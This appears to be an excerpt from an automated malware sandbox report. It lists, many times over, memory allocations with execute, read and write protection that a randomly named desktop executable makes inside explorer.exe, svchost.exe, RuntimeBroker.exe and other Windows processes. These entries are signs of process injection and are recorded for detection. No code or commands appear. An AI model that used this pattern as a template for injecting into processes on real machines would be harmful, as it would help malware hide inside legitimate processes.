            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2500000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2560000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: C70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: CC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2940000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2950000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: AF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 7A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 7B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 9E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: AE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: 20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 3C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 990000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: AC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 2D10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: BE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 8D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: EE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 960000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 590000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: DC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: A90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 6C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 9D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 9F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: AF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: 30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 3D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: AD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 2D30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: BF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 8E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: EF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 970000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 140000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: DD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: AA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 6D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 9E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: A00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: B00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: 40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 3E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: AE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 2D40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: C00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 8F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 980000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 150000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: DE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: AB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 6E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 9F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: A10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: B10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: 50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 3F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: AF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 2D50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: C10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 900000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 990000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 160000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: DF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: AC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 6F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: A20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: B20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: 60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: B00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 8880000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: C20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 910000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 170000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: E00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: AD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 700000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: A30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: B30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: 70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 410000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: B10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 8850000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: C30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 920000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: CA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: E10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: AE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 710000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: A40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: B40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 420000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: B20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 2F60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: C40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 930000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A30000 protect: page execute and read and writeJump to behavior
